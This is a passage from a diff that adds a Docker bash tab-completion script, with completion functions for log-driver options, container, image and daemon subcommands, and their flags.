splunk-source splunk-sourcetype splunk-token splunk-url splunk-verify-connection tag" + + local all_options="$fluentd_options $gcplogs_options $gelf_options $journald_options $logentries_options $json_file_options $syslog_options $splunk_options" + + case $(__docker_value_of_option --log-driver) in + '') + COMPREPLY=( $( compgen -W "$all_options" -S = -- "$cur" ) ) + ;; + awslogs) + COMPREPLY=( $( compgen -W "$awslogs_options" -S = -- "$cur" ) ) + ;; + fluentd) + COMPREPLY=( $( compgen -W "$fluentd_options" -S = -- "$cur" ) ) + ;; + gcplogs) + COMPREPLY=( $( compgen -W "$gcplogs_options" -S = -- "$cur" ) ) + ;; + gelf) + COMPREPLY=( $( compgen -W "$gelf_options" -S = -- "$cur" ) ) + ;; + journald) + COMPREPLY=( $( compgen -W "$journald_options" -S = -- "$cur" ) ) + ;; + json-file) + COMPREPLY=( $( compgen -W "$json_file_options" -S = -- "$cur" ) ) + ;; + logentries) + COMPREPLY=( $( compgen -W "$logentries_options" -S = -- "$cur" ) ) + ;; + syslog) + COMPREPLY=( $( compgen -W "$syslog_options" -S = -- "$cur" ) ) + ;; + splunk) + COMPREPLY=( $( compgen -W "$splunk_options" -S = -- "$cur" ) ) + ;; + *) + return + ;; + esac + + __docker_nospace +} + +__docker_complete_log_driver_options() { + local key=$(__docker_map_key_of_current_option '--log-opt') + case "$key" in + fluentd-async-connect) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + gelf-address) + COMPREPLY=( $( compgen -W "udp" -S "://" -- "${cur##*=}" ) ) + __docker_nospace + return + ;; + gelf-compression-level) + COMPREPLY=( $( compgen -W "1 2 3 4 5 6 7 8 9" -- "${cur##*=}" ) ) + return + ;; + gelf-compression-type) + COMPREPLY=( $( compgen -W "gzip none zlib" -- "${cur##*=}" ) ) + return + ;; + syslog-address) + COMPREPLY=( $( compgen -W "tcp:// tcp+tls:// udp:// unix://" -- "${cur##*=}" ) ) + __docker_nospace + __ltrim_colon_completions "${cur}" + return + ;; + syslog-facility) + COMPREPLY=( $( compgen -W " + auth + authpriv + cron + daemon + ftp + kern + local0 + local1 + 
local2 + local3 + local4 + local5 + local6 + local7 + lpr + mail + news + syslog + user + uucp + " -- "${cur##*=}" ) ) + return + ;; + syslog-format) + COMPREPLY=( $( compgen -W "rfc3164 rfc5424 rfc5424micro" -- "${cur##*=}" ) ) + return + ;; + syslog-tls-ca-cert|syslog-tls-cert|syslog-tls-key) + _filedir + return + ;; + syslog-tls-skip-verify) + COMPREPLY=( $( compgen -W "true" -- "${cur##*=}" ) ) + return + ;; + splunk-url) + COMPREPLY=( $( compgen -W "http:// https://" -- "${cur##*=}" ) ) + __docker_nospace + __ltrim_colon_completions "${cur}" + return + ;; + splunk-gzip|splunk-insecureskipverify|splunk-verify-connection) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + splunk-format) + COMPREPLY=( $( compgen -W "inline json raw" -- "${cur##*=}" ) ) + return + ;; + esac + return 1 +} + +__docker_complete_log_levels() { + COMPREPLY=( $( compgen -W "debug info warn error fatal" -- "$cur" ) ) +} + +__docker_complete_restart() { + case "$prev" in + --restart) + case "$cur" in + on-failure:*) + ;; + *) + COMPREPLY=( $( compgen -W "always no on-failure on-failure: unless-stopped" -- "$cur") ) + ;; + esac + return + ;; + esac + return 1 +} + +# __docker_complete_signals returns a subset of the available signals that is most likely +# relevant in the context of docker containers +__docker_complete_signals() { + local signals=( + SIGCONT + SIGHUP + SIGINT + SIGKILL + SIGQUIT + SIGSTOP + SIGTERM + SIGUSR1 + SIGUSR2 + ) + COMPREPLY=( $( compgen -W "${signals[*]} ${signals[*]#SIG}" -- "$( echo $cur | tr '[:lower:]' '[:upper:]')" ) ) +} + +__docker_complete_user_group() { + if [[ $cur == *:* ]] ; then + COMPREPLY=( $(compgen -g -- "${cur#*:}") ) + else + COMPREPLY=( $(compgen -u -S : -- "$cur") ) + __docker_nospace + fi +} + +_docker_docker() { + # global options that may appear after the docker command + local boolean_options=" + $global_boolean_options + --help + --version -v + " + + case "$prev" in + --config) + _filedir -d + return + ;; + 
--log-level|-l) + __docker_complete_log_levels + return + ;; + $(__docker_to_extglob "$global_options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $global_options_with_args" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag "$(__docker_to_extglob "$global_options_with_args")" ) + if [ $cword -eq $counter ]; then + __docker_is_experimental && commands+=(${experimental_commands[*]}) + COMPREPLY=( $( compgen -W "${commands[*]} help" -- "$cur" ) ) + fi + ;; + esac +} + +_docker_attach() { + _docker_container_attach +} + +_docker_build() { + _docker_image_build +} + + +_docker_checkpoint() { + local subcommands=" + create + ls + rm + " + local aliases=" + list + remove + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_checkpoint_create() { + case "$prev" in + --checkpoint-dir) + _filedir -d + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--checkpoint-dir --help --leave-running" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') + if [ $cword -eq $counter ]; then + __docker_complete_containers_running + fi + ;; + esac +} + +_docker_checkpoint_ls() { + case "$prev" in + --checkpoint-dir) + _filedir -d + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_checkpoint_rm() { + case "$prev" in + --checkpoint-dir) + _filedir -d + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') + if [ 
$cword -eq $counter ]; then + __docker_complete_containers_all + elif [ $cword -eq $(($counter + 1)) ]; then + COMPREPLY=( $( compgen -W "$(__docker_q checkpoint ls "$prev" | sed 1d)" -- "$cur" ) ) + fi + ;; + esac +} + + +_docker_container() { + local subcommands=" + attach + commit + cp + create + diff + exec + export + inspect + kill + logs + ls + pause + port + prune + rename + restart + rm + run + start + stats + stop + top + unpause + update + wait + " + local aliases=" + list + ps + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_container_attach() { + __docker_complete_detach-keys && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--detach-keys --help --no-stdin --sig-proxy=false" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--detach-keys') + if [ $cword -eq $counter ]; then + __docker_complete_containers_running + fi + ;; + esac +} + +_docker_container_commit() { + case "$prev" in + --author|-a|--change|-c|--message|-m) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--author -a --change -c --help --message -m --pause=false -p=false" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--author|-a|--change|-c|--message|-m') + + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + return + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + ;; + esac +} + +_docker_container_cp() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--follow-link -L --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + case "$cur" in + *:) + return + ;; + *) + # combined container and filename completion + _filedir + local files=( ${COMPREPLY[@]} ) + + 
__docker_complete_containers_all + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + local containers=( ${COMPREPLY[@]} ) + + COMPREPLY=( $( compgen -W "${files[*]} ${containers[*]}" -- "$cur" ) ) + if [[ "$COMPREPLY" == *: ]]; then + __docker_nospace + fi + return + ;; + esac + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + if [ -e "$prev" ]; then + __docker_complete_containers_all + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + __docker_nospace + else + _filedir + fi + return + fi + ;; + esac +} + +_docker_container_create() { + _docker_container_run +} + +_docker_container_diff() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_exec() { + __docker_complete_detach-keys && return + + case "$prev" in + --env|-e) + # we do not append a "=" here because "-e VARNAME" is legal systax, too + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --user|-u) + __docker_complete_user_group + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--detach -d --detach-keys --env -e --help --interactive -i --privileged -t --tty -u --user" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_export() { + case "$prev" in + --output|-o) + _filedir + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_inspect() { + _docker_inspect --type container +} + +_docker_container_kill() { + case "$prev" in + --signal|-s) + __docker_complete_signals + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --signal -s" -- "$cur" ) ) + ;; + *) + 
__docker_complete_containers_running + ;; + esac +} + +_docker_container_logs() { + case "$prev" in + --since|--tail) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--details --follow -f --help --since --tail --timestamps -t" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--since|--tail') + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_list() { + _docker_container_ls +} + +_docker_container_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + ancestor) + cur="${cur##*=}" + __docker_complete_images + return + ;; + before) + __docker_complete_containers_all --cur "${cur##*=}" + return + ;; + id) + __docker_complete_containers_all --cur "${cur##*=}" --id + return + ;; + health) + COMPREPLY=( $( compgen -W "healthy starting none unhealthy" -- "${cur##*=}" ) ) + return + ;; + is-task) + COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) + return + ;; + name) + __docker_complete_containers_all --cur "${cur##*=}" --name + return + ;; + network) + __docker_complete_networks --cur "${cur##*=}" + return + ;; + since) + __docker_complete_containers_all --cur "${cur##*=}" + return + ;; + status) + COMPREPLY=( $( compgen -W "created dead exited paused restarting running removing" -- "${cur##*=}" ) ) + return + ;; + volume) + __docker_complete_volumes --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "ancestor before exited health id is-task label name network since status volume" -- "$cur" ) ) + __docker_nospace + return + ;; + --format|--last|-n) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --filter -f --format --help --last -n --latest -l --no-trunc --quiet -q --size -s" -- "$cur" ) ) + ;; + esac +} + +_docker_container_pause() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + 
__docker_complete_containers_running + ;; + esac +} + +_docker_container_port() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_container_ps() { + _docker_container_ls +} + +_docker_container_rename() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_restart() { + case "$prev" in + --time|-t) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_all + ;; + esac +} + +_docker_container_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help --link -l --volumes -v" -- "$cur" ) ) + ;; + *) + for arg in "${COMP_WORDS[@]}"; do + case "$arg" in + --force|-f) + __docker_complete_containers_all + return + ;; + esac + done + __docker_complete_containers_stopped + ;; + esac +} + +_docker_container_run() { + local options_with_args=" + --add-host + --attach -a + --blkio-weight + --blkio-weight-device + --cap-add + --cap-drop + --cgroup-parent + --cidfile + --cpu-period + --cpu-quota + --cpu-rt-period + --cpu-rt-runtime + --cpuset-cpus + --cpus + --cpuset-mems + --cpu-shares -c + --device + --device-read-bps + --device-read-iops + --device-write-bps + --device-write-iops + --dns + --dns-option + --dns-search + --entrypoint + --env -e + --env-file + --expose + --group-add + --hostname -h + --init-path + --ip + --ip6 + --ipc + --isolation + --kernel-memory + --label-file + --label -l + --link + --link-local-ip + --log-driver + --log-opt + --mac-address + --memory -m 
+ --memory-swap + --memory-swappiness + --memory-reservation + --name + --network + --network-alias + --oom-score-adj + --pid + --pids-limit + --publish -p + --restart + --runtime + --security-opt + --shm-size + --stop-signal + --stop-timeout + --storage-opt + --tmpfs + --sysctl + --ulimit + --user -u + --userns + --uts + --volume-driver + --volumes-from + --volume -v + --workdir -w + " + + local boolean_options=" + --disable-content-trust=false + --help + --init + --interactive -i + --oom-kill-disable + --privileged + --publish-all -P + --read-only + --tty -t + " + + if [ "$command" = "run" -o "$subcommand" = "run" ] ; then + options_with_args="$options_with_args + --detach-keys + --health-cmd + --health-interval + --health-retries + --health-timeout + " + boolean_options="$boolean_options + --detach -d + --no-healthcheck + --rm + --sig-proxy=false + " + __docker_complete_detach-keys && return + fi + + local all_options="$options_with_args $boolean_options" + + + __docker_complete_log_driver_options && return + __docker_complete_restart && return + + local key=$(__docker_map_key_of_current_option '--security-opt') + case "$key" in + label) + [[ $cur == *: ]] && return + COMPREPLY=( $( compgen -W "user: role: type: level: disable" -- "${cur##*=}") ) + if [ "${COMPREPLY[*]}" != "disable" ] ; then + __docker_nospace + fi + return + ;; + seccomp) + local cur=${cur##*=} + _filedir + COMPREPLY+=( $( compgen -W "unconfined" -- "$cur" ) ) + return + ;; + esac + + case "$prev" in + --add-host) + case "$cur" in + *:) + __docker_complete_resolved_hostname + return + ;; + esac + ;; + --attach|-a) + COMPREPLY=( $( compgen -W 'stdin stdout stderr' -- "$cur" ) ) + return + ;; + --cap-add|--cap-drop) + __docker_complete_capabilities + return + ;; + --cidfile|--env-file|--init-path|--label-file) + _filedir + return + ;; + --device|--tmpfs|--volume|-v) + case "$cur" in + *:*) + # TODO somehow do _filedir for stuff inside the image, if it's already specified (which is also somewhat 
difficult to determine) + ;; + '') + COMPREPLY=( $( compgen -W '/' -- "$cur" ) ) + __docker_nospace + ;; + /*) + _filedir + __docker_nospace + ;; + esac + return + ;; + --env|-e) + # we do not append a "=" here because "-e VARNAME" is legal systax, too + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --ipc) + case "$cur" in + *:*) + cur="${cur#*:}" + __docker_complete_containers_running + ;; + *) + COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) + if [ "$COMPREPLY" = "container:" ]; then + __docker_nospace + fi + ;; + esac + return + ;; + --isolation) + __docker_complete_isolation + return + ;; + --link) + case "$cur" in + *:*) + ;; + *) + __docker_complete_containers_running + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + __docker_nospace + ;; + esac + return + ;; + --log-driver) + __docker_complete_log_drivers + return + ;; + --log-opt) + __docker_complete_log_options + return + ;; + --network) + case "$cur" in + container:*) + __docker_complete_containers_all --cur "${cur#*:}" + ;; + *) + COMPREPLY=( $( compgen -W "$(__docker_plugins_bundled --type Network) $(__docker_networks) container:" -- "$cur") ) + if [ "${COMPREPLY[*]}" = "container:" ] ; then + __docker_nospace + fi + ;; + esac + return + ;; + --pid) + case "$cur" in + *:*) + __docker_complete_containers_running --cur "${cur#*:}" + ;; + *) + COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) + if [ "$COMPREPLY" = "container:" ]; then + __docker_nospace + fi + ;; + esac + return + ;; + --runtime) + __docker_complete_runtimes + return + ;; + --security-opt) + COMPREPLY=( $( compgen -W "apparmor= label= no-new-privileges seccomp=" -- "$cur") ) + if [ "${COMPREPLY[*]}" != "no-new-privileges" ] ; then + __docker_nospace + fi + return + ;; + --storage-opt) + COMPREPLY=( $( compgen -W "size" -S = -- "$cur") ) + __docker_nospace + return + ;; + --user|-u) + __docker_complete_user_group + return + ;; + --userns) + COMPREPLY=( $( compgen -W "host" -- "$cur" ) 
) + return + ;; + --volume-driver) + __docker_complete_plugins_bundled --type Volume + return + ;; + --volumes-from) + __docker_complete_containers_all + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ $cword -eq $counter ]; then + __docker_complete_images + fi + ;; + esac +} + +_docker_container_start() { + __docker_complete_detach-keys && return + + case "$prev" in + --checkpoint) + if [ __docker_is_experimental ] ; then + return + fi + ;; + --checkpoint-dir) + if [ __docker_is_experimental ] ; then + _filedir -d + return + fi + ;; + esac + + case "$cur" in + -*) + local options="--attach -a --detach-keys --help --interactive -i" + __docker_is_experimental && options+=" --checkpoint --checkpoint-dir" + COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_stopped + ;; + esac +} + +_docker_container_stats() { + case "$prev" in + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --format --help --no-stream" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_stop() { + case "$prev" in + --time|-t) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_top() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_running + fi + ;; + esac +} + +_docker_container_unpause() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + 
__docker_complete_containers_unpauseable + fi + ;; + esac +} + +_docker_container_update() { + local options_with_args=" + --blkio-weight + --cpu-period + --cpu-quota + --cpu-rt-period + --cpu-rt-runtime + --cpuset-cpus + --cpuset-mems + --cpu-shares -c + --kernel-memory + --memory -m + --memory-reservation + --memory-swap + --restart + " + + local boolean_options=" + --help + " + + local all_options="$options_with_args $boolean_options" + + __docker_complete_restart && return + + case "$prev" in + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_all + ;; + esac +} + +_docker_container_wait() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_all + ;; + esac +} + + +_docker_commit() { + _docker_container_commit +} + +_docker_cp() { + _docker_container_cp +} + +_docker_create() { + _docker_container_run +} + +_docker_daemon() { + local boolean_options=" + $global_boolean_options + --disable-legacy-registry + --experimental + --help + --icc=false + --init + --ip-forward=false + --ip-masq=false + --iptables=false + --ipv6 + --live-restore + --raw-logs + --selinux-enabled + --userland-proxy=false + " + local options_with_args=" + $global_options_with_args + --add-runtime + --api-cors-header + --authorization-plugin + --bip + --bridge -b + --cgroup-parent + --cluster-advertise + --cluster-store + --cluster-store-opt + --config-file + --containerd + --default-gateway + --default-gateway-v6 + --default-ulimit + --dns + --dns-search + --dns-opt + --exec-opt + --exec-root + --fixed-cidr + --fixed-cidr-v6 + --graph -g + --group -G + --init-path + --insecure-registry + --ip + --label + --log-driver + --log-opt + --max-concurrent-downloads + --max-concurrent-uploads + --mtu + --oom-score-adjust + --pidfile -p + --registry-mirror + --seccomp-profile + --shutdown-timeout + 
--storage-driver -s + --storage-opt + --userland-proxy-path + --userns-remap + " + + __docker_complete_log_driver_options && return + + key=$(__docker_map_key_of_current_option '--cluster-store-opt') + case "$key" in + kv.*file) + cur=${cur##*=} + _filedir + return + ;; + esac + + local key=$(__docker_map_key_of_current_option '--storage-opt') + case "$key" in + dm.blkdiscard|dm.override_udev_sync_check|dm.use_deferred_removal|dm.use_deferred_deletion) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + dm.fs) + COMPREPLY=( $( compgen -W "ext4 xfs" -- "${cur##*=}" ) ) + return + ;; + dm.thinpooldev) + cur=${cur##*=} + _filedir + return + ;; + esac + + case "$prev" in + --authorization-plugin) + __docker_complete_plugins_bundled --type Authorization + return + ;; + --cluster-store) + COMPREPLY=( $( compgen -W "consul etcd zk" -S "://" -- "$cur" ) ) + __docker_nospace + return + ;; + --cluster-store-opt) + COMPREPLY=( $( compgen -W "discovery.heartbeat discovery.ttl kv.cacertfile kv.certfile kv.keyfile kv.path" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + --config-file|--containerd|--init-path|--pidfile|-p|--tlscacert|--tlscert|--tlskey|--userland-proxy-path) + _filedir + return + ;; + --exec-root|--graph|-g) + _filedir -d + return + ;; + --log-driver) + __docker_complete_log_drivers + return + ;; + --storage-driver|-s) + COMPREPLY=( $( compgen -W "aufs btrfs devicemapper overlay overlay2 vfs zfs" -- "$(echo $cur | tr '[:upper:]' '[:lower:]')" ) ) + return + ;; + --storage-opt) + local btrfs_options="btrfs.min_space" + local devicemapper_options=" + dm.basesize + dm.blkdiscard + dm.blocksize + dm.fs + dm.loopdatasize + dm.loopmetadatasize + dm.min_free_space + dm.mkfsarg + dm.mountopt + dm.override_udev_sync_check + dm.thinpooldev + dm.use_deferred_deletion + dm.use_deferred_removal + " + local zfs_options="zfs.fsname" + + case $(__docker_value_of_option '--storage-driver|-s') in + '') + COMPREPLY=( $( compgen -W "$btrfs_options 
$devicemapper_options $zfs_options" -S = -- "$cur" ) ) + ;; + btrfs) + COMPREPLY=( $( compgen -W "$btrfs_options" -S = -- "$cur" ) ) + ;; + devicemapper) + COMPREPLY=( $( compgen -W "$devicemapper_options" -S = -- "$cur" ) ) + ;; + zfs) + COMPREPLY=( $( compgen -W "$zfs_options" -S = -- "$cur" ) ) + ;; + *) + return + ;; + esac + __docker_nospace + return + ;; + --log-level|-l) + __docker_complete_log_levels + return + ;; + --log-opt) + __docker_complete_log_options + return + ;; + --seccomp-profile) + _filedir json + return + ;; + --userns-remap) + __docker_complete_user_group + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) + ;; + esac +} + +_docker_deploy() { + __docker_is_experimental && _docker_stack_deploy +} + +_docker_diff() { + _docker_container_diff +} + +_docker_events() { + _docker_system_events +} + +_docker_exec() { + _docker_container_exec +} + +_docker_export() { + _docker_container_export +} + +_docker_help() { + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + COMPREPLY=( $( compgen -W "${commands[*]}" -- "$cur" ) ) + fi +} + +_docker_history() { + _docker_image_history +} + + +_docker_image() { + local subcommands=" + build + history + import + inspect + load + ls + prune + pull + push + rm + save + tag + " + local aliases=" + images + list + remove + rmi + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_image_build() { + local options_with_args=" + --build-arg + --cache-from + --cgroup-parent + --cpuset-cpus + --cpuset-mems + --cpu-shares -c + --cpu-period + --cpu-quota + --file -f + --isolation + --label + --memory -m + --memory-swap + --network + --shm-size + --tag -t + --ulimit + " + + local 
boolean_options=" + --compress + --disable-content-trust=false + --force-rm + --help + --no-cache + --pull + --quiet -q + --rm + " + __docker_is_experimental && boolean_options+="--squash" + + local all_options="$options_with_args $boolean_options" + + case "$prev" in + --build-arg) + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --cache-from) + __docker_complete_image_repos_and_tags + return + ;; + --file|-f) + _filedir + return + ;; + --isolation) + __docker_complete_isolation + return + ;; + --network) + case "$cur" in + container:*) + __docker_complete_containers_all --cur "${cur#*:}" + ;; + *) + COMPREPLY=( $( compgen -W "$(__docker_plugins --type Network) $(__docker_networks) container:" -- "$cur") ) + if [ "${COMPREPLY[*]}" = "container:" ] ; then + __docker_nospace + fi + ;; + esac + return + ;; + --tag|-t) + __docker_complete_image_repos_and_tags + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ $cword -eq $counter ]; then + _filedir -d + fi + ;; + esac +} + +_docker_image_history() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --human=false -H=false --no-trunc --quiet -q" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_images + fi + ;; + esac +} + +_docker_image_images() { + _docker_image_ls +} + +_docker_image_import() { + case "$prev" in + --change|-c|--message|-m) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--change -c --help --message -m" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--change|-c|--message|-m') + if [ $cword -eq $counter ]; then + return + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags 
+ return + fi + ;; + esac +} + +_docker_image_inspect() { + _docker_inspect --type image +} + +_docker_image_load() { + case "$prev" in + --input|-i) + _filedir + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --input -i --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_image_list() { + _docker_image_ls +} + +_docker_image_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + before|since|reference) + cur="${cur##*=}" + __docker_complete_images + return + ;; + dangling) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + label) + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "before dangling label reference since" -- "$cur" ) ) + __docker_nospace + return + ;; + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --digests --filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) + ;; + =) + return + ;; + *) + __docker_complete_image_repos + ;; + esac +} + +_docker_image_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_image_pull() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all-tags -a --disable-content-trust=false --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + for arg in "${COMP_WORDS[@]}"; do + case "$arg" in + --all-tags|-a) + __docker_complete_image_repos + return + ;; + esac + done + __docker_complete_image_repos_and_tags + fi + ;; + esac +} + +_docker_image_push() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--disable-content-trust=false --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + fi + ;; + esac +} + +_docker_image_remove() { + _docker_image_rm +} + +_docker_image_rm() { + case "$cur" in + -*) + 
COMPREPLY=( $( compgen -W "--force -f --help --no-prune" -- "$cur" ) ) + ;; + *) + __docker_complete_images + ;; + esac +} + +_docker_image_rmi() { + _docker_image_rm +} + +_docker_image_save() { + case "$prev" in + --output|-o) + _filedir + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) + ;; + *) + __docker_complete_images + ;; + esac +} + +_docker_image_tag() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + ;; + esac +} + + +_docker_images() { + _docker_image_ls +} + +_docker_import() { + _docker_image_import +} + +_docker_info() { + _docker_system_info +} + +_docker_inspect() { + local preselected_type + local type + + if [ "$1" = "--type" ] ; then + preselected_type=yes + type="$2" + else + type=$(__docker_value_of_option --type) + fi + + case "$prev" in + --format|-f) + return + ;; + --type) + if [ -z "$preselected_type" ] ; then + COMPREPLY=( $( compgen -W "container image network node plugin service volume" -- "$cur" ) ) + return + fi + ;; + esac + + case 